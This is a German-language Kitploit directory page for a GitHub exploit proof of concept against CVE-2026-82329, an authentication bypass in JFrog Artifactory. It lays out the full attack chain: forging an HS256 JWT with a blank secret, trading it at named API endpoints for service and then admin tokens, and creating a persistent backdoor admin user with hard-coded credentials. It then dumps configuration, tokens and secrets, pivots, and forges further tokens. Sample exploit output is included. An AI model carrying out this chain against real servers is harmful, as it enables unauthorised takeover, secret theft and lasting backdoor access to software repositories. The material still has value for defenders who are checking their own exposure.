Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-82329-JFrog-Artifactory- — Exploit-PoC für CVE-2026-82329, eine Authentifizierungsumgehung in JFrog Artifactory. Demonstriert das Fälschen von JWT-Tokens, um Admin-Zugriff zu erlangen und einen persistenten Backdoor-Benutzer zu erstellen. | Kitploit
Tools/GitHubGitHub/0xterror/cve-2026-82329-jfrog-artifactory-
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHub0xterror/cve-2026-82329-jfrog-artifactory-

CVE-2026-82329-JFrog-Artifactory-

Exploit-PoC für CVE-2026-82329, eine Authentifizierungsumgehung in JFrog Artifactory. Demonstriert das Fälschen von JWT-Tokens, um Admin-Zugriff zu erlangen und einen persistenten Backdoor-Benutzer zu erstellen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 15h 41mNoch nicht geprüft

CVE-2026-82329-JFrog-Artifactory-

CVE-2026-82329 — JFrog Artifactory Auth Bypass

Die Schwachstelle

Kritische Authentifizierungsumgehung in JFrog Artifactory (Versionen 7.111.20, 7.117.27, 7.125.19, 7.133.28, 7.146.37, 7.161.19). Der Fehler ermöglicht es einem nicht authentifizierten Angreifer, ein JWT mit einem leeren HMAC-Geheimnis (32 Bytes aus 0x20) zu fälschen, ein Admin-Token zu erzeugen und einen Hintertür-Benutzer anzulegen.

Exploit-Kette

Schritt Aktion 1 JWT mit alg=HS256, kid=SHA256(""), skip_node_registration=true fälschen 2 JWT an /access/api/v1/registry/join senden → SERVICE-Token erhalten 3 SERVICE-Token über /access/api/v1/tokens gegen ADMIN-Token eintauschen 4 Admin-Zugriff über /artifactory/api/system/configuration, /access/api/v1/tokens, /artifactory/api/system/version verifizieren 5 Persistenten Admin-Benutzer über /artifactory/api/security/users/{user} anlegen 6 Konfiguration, Tokens, Benutzer, Repos, Geheimnisse auslesen 7 Tokens für hochwertige Subjekte fälschen

Angriffsablauf

root@kitploit:~
BLANK_SECRET = b"\x20" * 32
    ↓
JWT fälschen (HS256, kid=hashlib.sha256(""))
    ↓
POST /access/api/v1/registry/join
    ↓
SERVICE-Token (scp=admin)
    ↓
POST /access/api/v1/tokens
    ↓
ADMIN-Token (scp=applied-permissions/admin, aud=*)
    ↓
Admin nachweisen (GET /artifactory/api/system/configuration → 200)
    ↓
PUT /artifactory/api/security/users/0xTerror
    ↓
Persistenter Admin-Benutzer: 0xTerror:Terrorp0c!7777
    ↓
Auslesen: Konfiguration, Tokens, Benutzer, Repos, Geheimnisse
    ↓
Pivot-Check: Xray, Mission Control, Distribution, etc.
    ↓
Tokens für hochwertige Subjekte fälschen

PoC-Ausgabebeispiel

root@kitploit:~
[+] Schritt 1  /registry/join -> HTTP 201 SERVICE-Token (scp=admin)
[+] Schritt 2  /access/api/v1/tokens -> HTTP 200 ADMIN-Token (scp=applied-permissions/admin)
[+] Schritt 3  Admin-Nachweis: config=200, tokens=200, version=200
[+] Schritt 4  Admin-Benutzer '0xTerror' anlegen -> HTTP 201
[=] VERWUNDBAR — nicht authentifizierter Angreifer erhielt ADMIN
      Admin-Benutzer: 0xTerror:Terrorp0c!7777
Tool herunterladen